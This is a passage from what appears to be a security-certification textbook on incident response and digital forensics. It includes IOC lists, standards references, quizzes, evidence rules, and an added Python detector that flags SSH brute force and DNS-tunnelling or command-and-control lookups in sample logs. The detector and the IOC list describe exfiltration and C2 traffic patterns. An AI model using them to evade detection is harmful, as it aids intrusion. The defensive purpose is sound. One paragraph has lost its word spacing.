Once the excitement of the incident is over and operations have been restored to their pre-incident state, it is time to take care of a few last items. Senior-level management must be informed about what occurred and what was done to address it. An after-action report should be created to outline what happened and how it was addressed. Recommendations for improving processes and policies should be incorporated so that a repeat incident will not occur. If prosecution of the individual responsible is desired, additional time will be spent helping law enforcement agencies and possibly testifying in court. Training material may also need to be developed or modified as part of the new, modified policies and procedures.
In the reporting process, a critical assessment of what went right, what went wrong, what can be improved, and what should be continued is prepared as a form of lessons learned. This is a critical part of self-improvement, and is not meant to place blame, but rather to assist in future prevention. Having things go wrong in a complex environment is part of normal operations; having repeat failures that are preventable is not. The key to the lessons learned section of the report is to make the necessary changes so that a repeat event will not occur. Because many incidents are a result of attackers using known methods, once the attack patterns are known in an enterprise and methods exist to mitigate them, then it is the task of the entire enterprise to take the necessary actions to mitigate future events.
Standards and Best Practices
There are many options available to a team when planning and performing processes and procedures. To assist the team in choosing a path, there are both standards and best practices to consult in the proper development of processes. From government sources to industry sources, there are many opportunities to gather ideas and methods, even from fellow firms.
State of Compromise
The new standard of information security involves living in a state of compromise, where one should always expect that adversaries are active in their networks. It is unrealistic to expect that you can keep attackers out of your network. Operating in a state of compromise does not mean that one must suffer significant losses. A working assumption when planning for, responding to, and managing the overall incident response process is that the systems are compromised and that prevention cannot be the only means of defense.
NIST
The National Institute of Standards and Technology (NIST), a U.S. governmental entity under the Department of Commerce, produces a wide range of Special Publications (SPs) in the area of computer security. Grouped in several different categories, the most relevant SPs for incident response come from the Special Publications 800 series:
- Computer Security Incident Handling Guide, SP 800-61 Rev. 2
- NIST Security Content Automation Protocol (SCAP), SP 800-126 Rev. 2
- Information Security Continuous Monitoring for Federal Information Systems and Organizations, SP 800-137
- Guide to Selecting Information Technology Security Products, NIST SP 800-36
- Guide to Enterprise Patch Management Technologies, NIST SP 800-40 Rev. 3
- Guide to Using Vulnerability Naming Schemes [CVE/CCE], NIST SP 800-51 Rev. 1
Department of Justice
Tech Tip
What Not to Do as Part of Incident Response
The U.S. Department of Justice has two specific recommended steps that you should not take as part of an incident response action:
- Do not use the compromised system to communicate.
- Do not hack into or damage another network or system.
The victim organization should always assume that any communications across affected machines will be compromised. This eavesdropping action is standard hacker behavior, and if you tip off your actions, they can be countered before you regain control of your system. Hacking, even retaliatory hacking, is illegal, and given the difficulty in attribution, attempts to respond by hacking the hacker may accidentally result in hacking an innocent third-party machine.
In April 2015, the U.S. Department of Justice's Cybersecurity Unit released a best practices document, Best Practices for Victim Response and Reporting of Cyber Incidents. This document identifies steps to take before a cyber incident, the steps to take during an incident response action, a list of actions to not take, and what to do after the incident. The URL for the document is in the "For More Information" section at the end of the chapter.
Indicators of Compromise
Indicators of Compromise (IOCs) are artifacts left behind from computer intrusion activity. Detection of IOCs is a quick way to jump-start a response element. Originated by the security firm Mandiant, IOCs have spread in usage to a wide range of firms. IOCs act as a tripwire for responders. An IOC can be tied to a specific observable event, which then can be traced to related events, and to stateful artifacts such as Registry keys. One of the biggest challenges in incident response is getting on the trail of an attacker, and IOCs provide a means of getting on the trail.
Tech Tip
Common Indicators of Compromise
- Unusual outbound traffic: This probably is the clearest indicator that data is going where it shouldn't.
- Geographical irregularities: Communications going to countries in which no business ties exist is another key indicator that data is going where it shouldn't.
- Unusual login activity: Failed logins, login failures to nonexistent accounts, and so forth, may indicate compromise.
- Anomalous usage patterns for privileged accounts: Changes in patterns of when administrators typically operate and what they typically access may indicate compromise.
- Changes in database access patterns: This may indicate hackers are searching for data, or reading it to collect large quantities.
- Automated web traffic: Timing can show some requests are scripts, not humans.
- Change in HTML response sizes: SQL injection can result in large HTML response sizes.
- Large numbers of requests for specific files: Numerous requests for specific files, such as join.php, may indicate automated attack patterns.
- Mismatched port to application traffic: A common method of attempting to hide activity.
- Unusual DNS requests: Command and control server traffic.
- Unusual Registry changes: Indications of changes to a system state.
- Unexpected patching: Some hackers/malware will patch to prevent other hackers from entering a target.
- Bundles of data/files in the wrong place: Large aggregations of data, frequently encrypted, may be files being prepared for exfiltration.
- Changes to mobile device profiles: Mobile is the new perimeter, and changes may indicate malware.
- DDoS/DoS attacks: Denial of service is used as a tool to provide a smokescreen or distraction.
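Two of the indicators above turned into detection logic, as an added example that is not from the chapter: login failures against nonexistent accounts grouped by source, and many distinct random-looking subdomains queried under one domain from a single client (the shape of DNS command and control or tunnelling). The sshd lines follow the real OpenSSH "Failed password for invalid user" message; the DNS lines are a constructed resolver log; the thresholds are assumptions to be tuned against a baseline.

```python
"""Two IOC detectors run over constructed log lines.

Added example, not from the original chapter. The sshd lines follow the
real OpenSSH "Failed password for invalid user" format; the DNS lines are a
constructed "timestamp client qname" resolver log. Thresholds are
assumptions a team would tune to its own baseline."""
import math
import re
from collections import Counter, defaultdict

AUTH_LOG = """\
Apr 27 13:58:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.9 port 50122 ssh2
Apr 27 13:58:03 web1 sshd[2213]: Failed password for invalid user oracle from 203.0.113.9 port 50124 ssh2
Apr 27 13:58:04 web1 sshd[2215]: Failed password for invalid user test from 203.0.113.9 port 50126 ssh2
Apr 27 13:58:06 web1 sshd[2217]: Failed password for invalid user guest from 203.0.113.9 port 50128 ssh2
Apr 27 14:02:40 web1 sshd[2290]: Failed password for alice from 10.0.0.15 port 41002 ssh2
Apr 27 14:02:47 web1 sshd[2290]: Accepted password for alice from 10.0.0.15 port 41002 ssh2
""".splitlines()

DNS_LOG = """\
2015-04-27T14:03:01 10.0.0.7 www.example.com
2015-04-27T14:03:02 10.0.0.7 mail.example.com
2015-04-27T14:03:05 10.0.0.7 x7k2p9q1a.tunnel-example.net
2015-04-27T14:03:06 10.0.0.7 m4n8b3v6z.tunnel-example.net
2015-04-27T14:03:07 10.0.0.7 q9w2e5r7t.tunnel-example.net
2015-04-27T14:03:08 10.0.0.7 z1x3c5v7b.tunnel-example.net
2015-04-27T14:03:09 10.0.0.7 k8j6h4g2f.tunnel-example.net
2015-04-27T14:03:10 10.0.0.22 www.example.com
""".splitlines()

INVALID_USER = re.compile(r"Failed password for invalid user (\S+) from (\S+) port")


def invalid_user_sources(lines, min_attempts=3):
    """Sources that failed against at least `min_attempts` distinct nonexistent
    accounts. A real user's typos do not name several accounts that do not exist."""
    seen = defaultdict(set)
    for line in lines:
        m = INVALID_USER.search(line)
        if m:
            seen[m.group(2)].add(m.group(1))
    return {src: sorted(users) for src, users in seen.items() if len(users) >= min_attempts}


def shannon_entropy(label: str) -> float:
    """Bits per character; human-chosen hostnames score low, random labels high."""
    counts = Counter(label)
    return -sum(c / len(label) * math.log2(c / len(label)) for c in counts.values())


def suspicious_dns(lines, min_subdomains=5, min_entropy=2.5):
    """Registered domains receiving many distinct, random-looking subdomain
    lookups from one client: the shape of DNS tunnelling or DGA-style C2."""
    per_domain = defaultdict(lambda: defaultdict(set))
    for line in lines:
        _ts, client, qname = line.split()
        labels = qname.lower().split(".")
        if len(labels) < 3:          # apex-only lookups carry no subdomain to judge
            continue
        apex = ".".join(labels[-2:])
        per_domain[apex][client].add(labels[0])
    hits = []
    for apex, clients in per_domain.items():
        for client, subs in clients.items():
            if len(subs) >= min_subdomains:
                avg_entropy = sum(map(shannon_entropy, subs)) / len(subs)
                if avg_entropy >= min_entropy:
                    hits.append((client, apex, len(subs), round(avg_entropy, 2)))
    return sorted(hits)


if __name__ == "__main__":
    print("brute force against nonexistent accounts:", invalid_user_sources(AUTH_LOG))
    print("suspicious DNS:", suspicious_dns(DNS_LOG))
```

Both detectors key on the shape of the activity rather than on a specific string, which is what makes an indicator useful against an attacker who changes names and addresses; the price is that the thresholds have to be set from the organization's own normal traffic, or the DNS check will flag a content delivery network just as readily.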
There are several standards associated with IOCs, but the three main ones are Cyber Observable eXpression (CybOX), a method of information sharing developed by MITRE; OpenIOC, an open source initiative established by Mandiant that is designed to facilitate rapid communication of specific threat information associated with known threats; and the Incident Object Description Exchange Format (IODEF), an XML format specified in RFC 5070 for conveying incident information between response teams, both internally and externally with respect to organizations. The "For More Information" section at the end of the chapter provides URLs for all three standards.
Cyber Kill Chain
A modern cyberattack is a complex, multistage process. The concept of a kill chain is the targeting of specific steps of a multistep process with the goal of disrupting the overall process. The term cyber kill chain is the application of this philosophy to a cyber incident, with the express purpose of disrupting the attack.
Taking the information already presented, we know the steps that hackers take and we have indicators that can clue us in to the current status of an attack. Using this information, we can plan specific interventions for each step of the attacker's process. The kill chain process has received a lot of press since it was introduced by Lockheed Martin, some positive and some negative. In most cases, the negative press is related to what many would call a misapplication of the model. As with all security models and defensive strategies, it is important to customize and adapt how it interacts with the specific processes it is meant to protect.
Making Security Measurable
MITRE, working together with partners from government, industry, and academia, has created a set of techniques (called Making Security Measurable) to improve the measurability of security. This is a comprehensive effort, including registries of specific baseline data, standardized languages for the accurate communication of security information, and formats and standardized processes to facilitate accurate and timely communications. The entirety of the project is beyond the scope of this text, but Table 22.1 lists some of the common items by category, a few of which are described next in a bit more detail.
Table 22.1 Sample Elements of Making Security Measurable
STIX and TAXII
MITRE has continued its efforts in the process of making security measurable and adding automation to the mix. Structured Threat Information eXpression (STIX) is a structured language for cyber threat intelligence information. MITRE created Trusted Automated eXchange of Indicator Information (TAXII) as the main transport mechanism for cyber threat information represented by STIX. TAXII services allow organizations to share cyber threat information in a secure and automated manner.
CybOX
Cyber Observable eXpression (CybOX) is a standardized schema for the communication of observed data from the operational domain. Designed to streamline communications associated with incidents, CybOX provides a means of communicating key elements, including event management, incident management, and more, in an effort to improve interoperability, consistency, and efficiency.
Chapter 22 Review
For More Information
CybOX: https://cybox.mitre.org/
DOJ Best Practices for Victim Response and Reporting of Cyber Incidents: www.justice.gov/sites/default/files/criminal-ccips/legacy/2015/04/30/04272015reporting-cyber-incidents-final.pdf
Incident Object Description Exchange Format (IODEF): https://tools.ietf.org/html/rfc5070
Making Security Measurable: http://makingsecuritymeasurable.mitre.org/
OpenIOC Framework: www.openioc.org/
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about incident response.
Understand the foundations of incident response processes
- The role of incident management is the control of a coordinated and comprehensive response to an incident.
- Learn the anatomy of an attack, both old versions and newer APT-style attacks.
- The goals of incident response in an organization are to restore systems to functioning order and prevent future risk.
Implement the detailed steps of an incident response process
- The major steps in the incident response process are preparation, incident identification, initial response, incident isolation, strategy formulation, investigation, recovery, reporting, and follow-up.
- Develop a detailed understanding of the components of each of the steps.
- Understand the linkages and interconnections between key process steps.
Describe standards and best practices that are involved in incident response
- Modern systems should expect to exist in a state of compromise and have policies and processes designed to operate under these conditions.
- The U.S. government, including NIST and the Department of Justice, has published useful guidance.
- Indicators of compromise provide early-warning triggers for incident response investigators.
- Taking actions against an incident in progress can be planned using a cyber kill chain philosophy.
- The Making Security Measurable material from MITRE can assist in the incident response process.
Key Terms
advanced persistent threat (APT), Computer Emergency Response Team (CERT), Computer Incident Response Team (CIRT), cyber kill chain, Cyber Observable eXpression (CybOX), data minimization, footprinting, incident, incident response, incident response policy, Indicator of Compromise (IOC), information criticality, quarantine, remote administration Trojan (RAT), Structured Threat Information eXpression (STIX), Trusted Automated eXchange of Indicator Information (TAXII)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. A(n) _______________ is any event in an information system or network where the results are different than normal.
2. When the attackers are focused on maintaining a presence during an incident, the type of attack is typically called a(n) _______________.
3. The determination of boundaries during an attack is a process called _______________.
4. The steps an organization performs in response to any situation determined to be abnormal in the operation of a computer system are called _______________.
5. One methodology for planning incident response defenses is known as _______________.
6. A(n) _______________ is an artifact that can be used to detect the presence of an attack.
7. To remove an item from normal operation and use is a process referred to as _______________.
8. A(n) _______________ is a team-based approach to incident response in an organization.
9. A key measure used to prioritize incident response actions is _______________.
10. _______________ and _______________ are used to communicate cyber threat information between organizations.
Multiple-Choice Quiz
1. Which of the following is not an Indicator of Compromise (IOC)?
A. Unusual outbound traffic
B. Increase in traffic over port 80
C. Traffic to unusual foreign IP addresses
D. Discovery of large encrypted data blocks that you don't know the purpose of
2. A sysadmin thinks a machine is under attack, so he logs in as root and attempts to see what is happening on the machine. Which common technical mistake is most likely to occur?
A. The alteration of date/time stamps on files and objects in the system
B. Failure to recognize the attacker by process ID
C. Erasure of logs associated with an attack
D. The cutting of a network connection between an attacker and the current machine
3. What is the last step of the incident response process?
A. Reconstitution
B. Recovery
C. Follow-up
D. Lessons learned
4. Which of the following are critical elements in an incident response toolkit? (Choose all that apply.)
A. Accurate network diagram
B. Findings of last penetration test report
C. List of critical data/systems
D. Phone list of people on-call by area
5. Your organization experienced an APT hack in the past and is very interested in preventing a reoccurrence. What step of the attack path is the best step at which to combat APT-style attacks?
A. Escalate privilege
B. Establish foothold
C. Lateral movement
D. Initial compromise
6. The goals of an incident response process include all of the following except:
A. Confirm or dispel an incident occurrence
B. Minimize security expenditures
C. Protect privacy rights
D. Minimize system disruption
7. During an initial response to an incident, which of the following is most important?
A. Who or what is reporting the incident
B. The time of the report
C. Who takes the initial report
D. Accurate information
8. When determining the level of risk of exposure for data in storage, in transit, or during processing, which of the following is not a factor?
A. Time
B. Quantity
C. Data type
D. Access
9. While working on an investigation, a colleague hands you a list of file creation and access times taken from a compromised workstation. To match the times with file access and creation times from other systems, what do you need to account for?
A. Record time offsets
B. Network Time Protocol
C. Created, modified, and accessed times
D. Operating system offsets
10. Which of the following activities should you not do during an incident response investigation associated with an APT?
A. Use the corporate e-mail system to communicate
B. Determine system time offsets
C. Use only qualified and trusted tools
D. Create an off-network site for data collection
Essay Quiz
1. The Chief Financial Officer (CFO) sees you in the lunchroom. Knowing that you are leading the company's incident response initiative, she comes over to your table and asks if you have time to answer a question. You are surprised, but say yes. Her question is simple and to the point: "Can you explain this incident response thing to me, in nontechnical terms, so I can respond appropriately at the next board meeting in the discussion?" In response, you offer to prepare a written outline for the CFO. In one page, outline the major points that need to be addressed and give examples in language suitable for the audience.
2. Explain the relationship between the anatomy of a hack and Indicators of Compromise.
Chapter 23 Computer Forensics
"How often have I said to you that when you have eliminated the impossible, whatever remains, however improbable, must be the truth?"
—Sir Arthur Conan Doyle
In this chapter, you will learn how to
- Explore the basics of digital forensics
- Identify the rules and types of evidence
- Collect evidence
- Preserve evidence
- Maintain a viable chain of custody
- Investigate a computer crime or policy violation
- Examine system artifacts
- Develop forensic policies and procedures
- Examine the policies and procedures associated with e-discovery
Computer forensics is certainly a popular buzzword in computer security. This chapter addresses the key aspects of computer forensics in preparation for the CompTIA Security+ certification exam. It is not intended to be a treatise on the topic or a legal tutorial regarding the presentation of evidence in a court of law. This material is only an introduction to the topic, and before one enters into forensic work or practice, much additional study is necessary. The principles presented in this chapter are of value in conducting any investigative processes, including internal or external audit procedures, but many nuances of handling legal cases are far beyond the scope of this text.
The term forensics relates to the application of scientific knowledge to legal problems. Specifically, computer forensics involves the preservation, identification, documentation, and interpretation of computer data. In today's practice, computer forensics can be performed for three purposes:
- Investigating and analyzing computer systems as related to a violation of law
- Investigating and analyzing computer systems for compliance with an organization's policies
- Responding to a request for digital evidence (e-discovery)
Forensics is often associated with incident response, the procedures used to respond to an abnormal condition in a system. There is a subtle difference, however: incident response is about corrective action, returning the system to a normal operational state, whereas forensics is about figuring out what happened.
Cross Check
Incident Response
Incident response and associated policies and procedures are covered in Chapter 22.
If an unauthorized person accesses a system, that person likely has violated the law. However, a company employee who performs similar acts (accessing data remotely) may or may not violate laws, the determination of which depends on many factors, including specific authorizations and job duties. One can violate corporate policies while acting lawfully with respect to computer laws. It is worth noting that knowingly exceeding one's authorizations with respect to system access is a violation of the law. Any of these situations could ultimately result in legal action and may require legal disclosure. Therefore, it is important to note that computer forensic actions may, at some point in time, deal with legal violations, and investigations could go to court proceedings. As a potential first responder, you should always seek legal counsel. Also seek legal counsel ahead of time as you develop and implement corporate policies and procedures. It is extremely important to understand that even minor procedural missteps can have significant legal consequences. The rule to follow is simple: always assume that the material will be used in a court of law and thus must be handled in a perfectly proper manner at all times. This further means that when dealing with forensics, you must ensure that all steps are performed by qualified forensic examiners.
EvidenceEvidenceconsistsofthedocuments,verbalstatements,andmaterialobjectsthatareadmissibleinacourtoflaw.Evidenceiscriticaltoconvincingmanagement,juries,judges,orotherauthoritiesthatsomekindofviolationhasoccurred.Thesubmissionofevidenceischallenging,butitisevenmorechallengingwhencomputersareusedbecausethepeopleinvolvedmaynotbetechnicallyeducatedandthusmaynotfullyunderstandwhat’shappened.Computerevidencepresentsyetmorechallengesbecausethedataitself
cannotbeexperiencedwiththephysicalsenses—thatis,youcanseeprintedcharacters,butyoucan’tseethebitswherethatdataisstored.Bitsofdataaremerelymagneticpulsesonadiskorsomeotherstoragetechnology.Therefore,datamustalwaysbeevaluatedthroughsomekindof“filter”ratherthansenseddirectly.Thisisoftenofconcerntoauditors,becausegoodauditingtechniquesrecommendaccessingtheoriginaldataoraversionthatisascloseaspossibletotheoriginaldata.
Types of Evidence
The digital forensic process is a technically demanding one, with no room for errors. The most common cause of evidence from an investigation being excluded from court proceedings is spoliation, the unauthorized alteration or destruction of digital evidence. If the forensic process is less than perfect, the opposing side will assume spoliation. The best guidance is (1) always perform forensics as if you are going to court with the evidence, and (2) if you do not have qualified digital forensic investigators in-house, do nothing to the device or media; let a professional handle it.
All evidence is not created equal. Some evidence is stronger and better than other evidence. Several types of evidence can be germane:
Direct evidence Oral testimony that proves a specific fact (such as an eyewitness's statement). The knowledge of the facts is obtained through the five senses of the witness, with no inferences or presumptions.
Real evidence Also known as associative or physical evidence, this includes tangible objects that prove or disprove a fact. Physical evidence links the suspect to the scene of a crime.
Documentary evidence Evidence in the form of business records, printouts, manuals, and the like. Much of the evidence relating to computer crimes is documentary evidence.
Demonstrative evidence Used to aid the jury and can be in the form of a model, experiment, chart, and so on, offered to prove that an event occurred.
Standards for Evidence
Evidence in U.S. federal court cases is governed by a series of legal precedents, the most notable of which is the Daubert standard. Three U.S. Supreme Court cases articulate the Daubert standard and shape how materials are entered into evidence. Four specific elements are associated with the admission of scientific expert testimony. This is important with respect to digital forensics because the form of the evidence means that it can rarely speak for itself; rather, it must be interpreted by an expert and presented to the court.
The first element is that the judge is the gatekeeper. Materials are not considered evidence until declared so by the judge. This is to ensure that experts are determined to be experts before the court relies upon their judgment. A second element is reliability and relevance. The trial judge is to determine that the expert's testimony is relevant to the proceedings at hand, and that the expert's methods are reliable with respect to the material being attested to. The third element is that expert knowledge should be based on science, specifically science that is based on the scientific method with a replicable methodology. The final element relates to this scientific methodology, stating that it must be based on proven science, subjected to peer review, with a known error rate or potential error rate and consensus among the scientific community that the methodology is generally accepted. After these elements are satisfied, the judge can admit the expert's testimony as evidence.
These factors all relate to a U.S. federal court decision and therefore are only binding in the U.S. federal judiciary, but the test is recognized and applied in similar form at many levels of jurisdiction. The bottom line is simple: the data can't speak for itself, and experts who can interpret the data operate under strict guidelines with respect to conduct, qualifications, principles, and methods.
To be credible, especially if evidence will be used in court proceedings or in corporate disciplinary actions that could be challenged legally, evidence must meet three standards:
Sufficient evidence It must be convincing or measure up without question.
Competent evidence It must be legally qualified and reliable.
Relevant evidence It must be material to the case or have a bearing on the matter at hand.
Tech Tip
Evidence Control Mental Checklist
Keep these points in mind as you collect evidence:
Who collected the evidence?
How was it collected?
Where was it collected?
Who has had possession of the evidence?
How was it protected and stored?
When was it removed from storage? Why? Who took possession?
Three Rules Regarding Evidence
An item can become evidence when it is admitted by a judge in a case. Three rules guide the use of evidence with regard to its use in court proceedings:
Best evidence rule Courts prefer original evidence rather than a copy, to ensure that no alteration of the evidence (whether intentional or unintentional) has occurred. In some instances, an evidence duplicate can be accepted, such as when the original is lost or destroyed by acts of God or in the normal course of business. A duplicate is also acceptable when a third party beyond the court's subpoena power possesses the original. For digital media, a bit-for-bit forensic image whose hash value matches the original is generally accepted in place of the original drive, which is one reason hash values are recorded at the moment of imaging.
Exclusionary rule The Fourth Amendment to the U.S. Constitution precludes illegal search and seizure. Therefore, any evidence collected in violation of the Fourth Amendment is not admissible as evidence. Additionally, if evidence is collected in violation of the Electronic Communications Privacy Act (ECPA) or other related provisions of the U.S. Code, it may not be admissible to a court. For example, if no policy exists regarding the company's intent to monitor network traffic or systems electronically, and the employee has not acknowledged this policy by signing an agreement, sniffing the employee's network traffic could be a violation of the ECPA.
Hearsay rule Hearsay is secondhand evidence: evidence offered by the witness that is not based on the personal knowledge of the witness but is being offered to prove the truth of the matter asserted. Traditionally, computer-generated evidence has been treated as hearsay, as the maker of the evidence (the computer) cannot be interrogated. There are exceptions, most notably the business records exception, under which items such as logs and headers (computer-generated materials) are accepted in court, but they apply only when the records are shown to have been produced and kept in a routine, reliable way, which again places the burden on the integrity of the collection process.
The laws mentioned here are U.S. laws. Other countries and jurisdictions may have similar laws that would need to be considered in a similar manner.
Forensic Process
Forensics is the use of scientific methods in the analysis of matters in connection with crime or other legal matters. Because of the connection to law, it is an exacting process, with no room for error. In digital forensics, the issue of alteration becomes paramount, because changing 1's to 0's does not leave a trace in many situations. Because of the issue of contamination or spoliation of evidence, detailed processes are used in the processing of information. From a high-level point of view, multiple steps are employed in a digital forensic investigation:
1. Identification Recognize an incident from indicators and determine its type and scope. This is not explicitly within the field of forensics but is significant because it impacts other steps. What tools were used? How many systems are involved? How much data is to be copied? These questions all have ramifications on the successful outcome of a forensic process.
2. Preparation Prepare tools, techniques, and search warrants, and monitor authorizations and management support.
3. Approach/strategy Dynamically formulate an approach based on potential impact on bystanders and the specific technology in question. The goal of the strategy should be to maximize the collection of untainted evidence while minimizing impact to the victim or owner.
4. Preservation Isolate, secure, and preserve the state of physical and digital evidence. This includes preventing people from using the digital device or allowing other electromagnetic devices to be used within a certain proximity. Proper preservation is essential to prevent alteration of the source.
5. Collection Record the physical scene and duplicate digital evidence using standardized and accepted procedures. This is where a digital camera and microphone are vital tools for capturing details (serial numbers, layouts, and so forth) quickly and definitively.
6. Examination In-depth, systematic search of evidence relating to the suspected crime. This step occurs later, in a lab, and focuses on identifying and locating potential specific evidence elements, possibly within unconventional locations. It is important to construct detailed documentation for analysis, documenting the metadata and data values that may be relevant to the issues at hand in the investigation.
7. Analysis Determine significance, reconstruct fragments of data, and draw conclusions based on the elements of evidence found. The data itself cannot tell a story, and in this step the investigator weaves the elements into a picture, hopefully the only one that can be supported. Although the intuition is to prove guilt, the skilled and seasoned investigator focuses on painting the picture that the data describes, regardless of outcome, and making it comprehensive and complete so that it will stand up to challenge. Multiple people with different skill sets may be needed to complete the picture.
8. Presentation Summarize and provide an explanation of the conclusions. The results should be written in layperson's terms using abstracted terminology. If you cannot explain the information to a nontechnical layperson, then you do not understand it well enough to complete this aspect. All abstracted terminology should reference the specific details of the case.
9. Returning evidence Ensure physical and digital property is returned to its proper owner and determine how and what criminal evidence must be removed. (For example, hardware may be returned, but images of child pornography would be removed.) This is not an explicit step of forensic investigation, and most models that address how to seize evidence rarely address this aspect. But at the end of the day, the job is not done until all aspects are finished, and this includes this level of clean-up activity.
When information or objects are presented to management or admitted to court to support a claim, that information or those objects can be considered as evidence or documentation supporting your investigative efforts. Senior management will always ask a lot of questions, second- and third-order questions that you need to be able to answer quickly. Likewise, in a court, credibility is critical. Therefore, evidence must be properly acquired, identified, protected against tampering, transported, and stored.
Exam Tip: A digital camera is great for recording a scene and information. Screenshots of active monitor images may be obtained as well. Pictures can detail elements such as serial number plates, machines, drives, cable connections, and more. Photographs are truly worth a thousand words.
Acquiring Evidence
When an incident occurs, you will need to collect data and information to facilitate your investigation. If someone is committing a crime or intentionally violating a company policy, she will likely try to hide her tracks. Therefore, you should collect as much information as soon as you can. In today's highly networked world, evidence can be found not only on the workstation or laptop computer, but also on company-owned file servers, security appliances, and servers located with the Internet service provider (ISP).
Tech Tip
Data Volatility
From the most volatile to the most persistent:
1. CPU storage (registers/cache)
2. System storage (RAM)
3. Kernel tables
4. Fixed media
5. Removable media
6. Output/hard copy
A first responder must do as much as possible to control damage or loss of evidence. Obviously, as time passes, evidence can be tampered with or destroyed. Look around on the desk, on the Rolodex, under the keyboard, in desktop storage areas, and on cubicle bulletin boards for any information that might be relevant. Secure floppy disks, optical discs, flash memory cards, USB drives, tapes, and other removable media. Request copies of logs as soon as possible. Most ISPs protect logs that could be subpoenaed. Take photos (some localities require use of Polaroid photos, as they are more difficult to modify without obvious tampering) or video. Include photos of operating computer screens and hardware components from multiple angles. Be sure to photograph internal components before removing them for analysis.
Microsoft produced a forensic tool for law enforcement called COFEE (Computer Online Forensic Evidence Extractor) that can be used to collect a wide range of data from a suspect machine. Restricted by license to law enforcement, it is out of reach for most investigators. An examination of how it functions provides useful information, and many of its functions can be readily copied by investigators. COFEE is a wrapper for a whole host of utilities (think Sysinternals and more), all integrated by script. This automated process can be re-created by any competent forensic investigator. Automated scripts and tools reduce errors and increase effectiveness.
When an incident occurs and the computer being used is going to be secured, you must consider two questions: Should it be turned off, and should it be disconnected from the network? Forensic professionals debate the reasons for leaving a computer on or turning it off. Some state that the plug should be pulled in order to freeze the current state of the computer. However, this results in the loss of any data associated with an attack in progress from the machine. Any data in RAM will also be lost. Further, it may corrupt the computer's file system and could call into question the validity of your findings.
Exam Tip: File timestamps may be of use during the analysis phase. To correlate file timestamps to actual time, it is important to know the time offset between the system clock and real time. Recording the time offset while the system is live is critical if the system clock is different than actual time.
Imaging or dumping the physical memory of a computer system can help identify evidence that is not available on a hard drive. This is especially appropriate for rootkits, for which evidence on the hard drive is hard to find. Once the memory is imaged, you can use a hex editor or a memory analysis framework to analyze the image offline on another system. (Memory-dumping tools and hex editors are available on the Internet.) Note that dumping memory is more applicable for investigative work where court proceedings will not be pursued. If a case is likely to end up in court, do not dump memory without first seeking legal advice to confirm that live analysis of the memory is acceptable; otherwise, the defendant will easily be able to dispute the claim that evidence was not tampered with. Whatever you decide, remember that the acquisition tool itself runs on the live system and necessarily alters a small part of its state, so document which tool was run, from what media, and when.
On the other hand, it is possible for the computer criminal to leave behind a software bomb that you don't know about, and any commands you execute, including shutting down or restarting the system, could destroy or modify files, information, or evidence. The criminal may have anticipated such an investigation and altered some of the system's binary files. While teaching at the University of Texas, Austin, Dr. Larry Leibrock led a research project to quantify how many files are changed when turning off and on a Windows workstation. The research documents that approximately 0.6 percent of the operating system files are changed each time a Windows XP system is shut down and restarted. An administrator looking at a machine at the behest of management can completely obfuscate any data that could be recovered, a process called spoliation. This cannot be undone and renders the data unusable in legal proceedings, whether court or human resources.
Exam Tip: For CompTIA Security+ testing purposes, remember this: the memory should be dumped, the system should be powered down cleanly, and an image should be made and used as you work.
Further, if the computer being analyzed is a server, it is unlikely management will support taking it offline and shutting it down for investigation. So, from an investigative perspective, either course may be correct or incorrect, depending on the circumstances surrounding the incident. What is most important is that you are deliberate in your work, you document your actions, and you can explain why you took the actions you performed.
Many investigative methods are used. Figure 23.1 shows the continuum of investigative methods from simple to more rigorous.
• Figure 23.1 Investigative method rigor
Figure 23.2 shows the relationship between the complexity of your investigation and both the reliability of your forensic data and the difficulty of investigation.
• Figure 23.2 Required rigor of the investigative method versus both data reliability and the difficulty of investigation
Identifying Evidence
Evidence must be properly marked as it is collected so that it can be identified as a particular piece of evidence gathered at the scene. Properly label and store evidence, and make sure the labels can't be easily removed. Keep an evidence control logbook identifying each piece of evidence (in case the label is removed); the persons who discovered it; the case number; the date, time, and location of the discovery; and the reason for collection. Keep a log of all staff hours and expenses. This information should be specific enough for recollection later in court. It is important to log other identifying marks, such as device make, model, serial number, cable configuration or type, and so on. Note any type of damage to the piece of evidence.
You should never examine a system with the utilities provided by that system. You should always use utilities that have been verified as correct and uncorrupted. Even better, use a forensic workstation, a computer system specifically designed to perform computer forensic activities. Do not open any files or start any applications. If possible, document the current memory and swap files, running processes, and open files. Disconnect the system from the network and immediately contact senior management. Unless you have appropriate forensic training and experience, consider calling in a professional.
Being methodical is extremely important when identifying evidence. Do not collect evidence by yourself; have a second person who can serve as a witness to your actions. Keep logs of your actions during both seizure and during analysis and storage. A sample log, providing the minimum contents of an evidence control logbook entry, is shown here:
Third-party investigators are commonly used in civil matters. When doing digital forensics for a civil litigation–based case, it is important to consult with the retaining counsel concerning the level of detail and records desired. In civil litigation, anything written will be requested to be disclosed during pretrial discovery. This can provide strategy disclosure beyond what is desired by counsel. The alternative is to keep the minimal required records as determined by counsel.
Protecting Evidence
Protect evidence from electromagnetic or mechanical damage. Ensure that evidence is not tampered with, damaged, or compromised by the procedures used during the investigation. This helps avoid potential liability problems later. Protect evidence from extremes in heat and cold, humidity, water, magnetic fields, and vibration. Use static-free evidence-protection gloves as opposed to standard latex gloves. Seal the evidence in a proper container with evidence tape, and mark it with your initials, date, and case number. For example, if a mobile phone with advanced capabilities is seized, it should be properly secured in a hard container designed to prevent accidentally pressing the keys during transit and storage. If the phone is to remain turned on for analysis, radio frequency isolation bags that attenuate the device's radio signal should be used. This will prevent remote wiping, locking, or disabling of the device.
Transporting Evidence
Properly log all evidence in and out of controlled storage. Use proper packing techniques, such as placing components in static-free bags, using foam packing material, and using cardboard boxes. Be especially cautious during transport of evidence to ensure custody of evidence is maintained and the evidence isn't damaged or tampered with.
Tech Tip
Protecting Evidence
Any and all collected digital evidence needs to be protected from a wide range of potential losses: environmental, theft, actual loss, alteration, physical or electrical damage, or even the perception of the possibility of loss occurring. In any legal proceeding, whether criminal or civil, the other party will always examine the storage conditions and, if less than perfect, place the burden on the person storing it to prove that it is still intact. This is just one reason why recording hash values upon collection is so important.
Storing Evidence
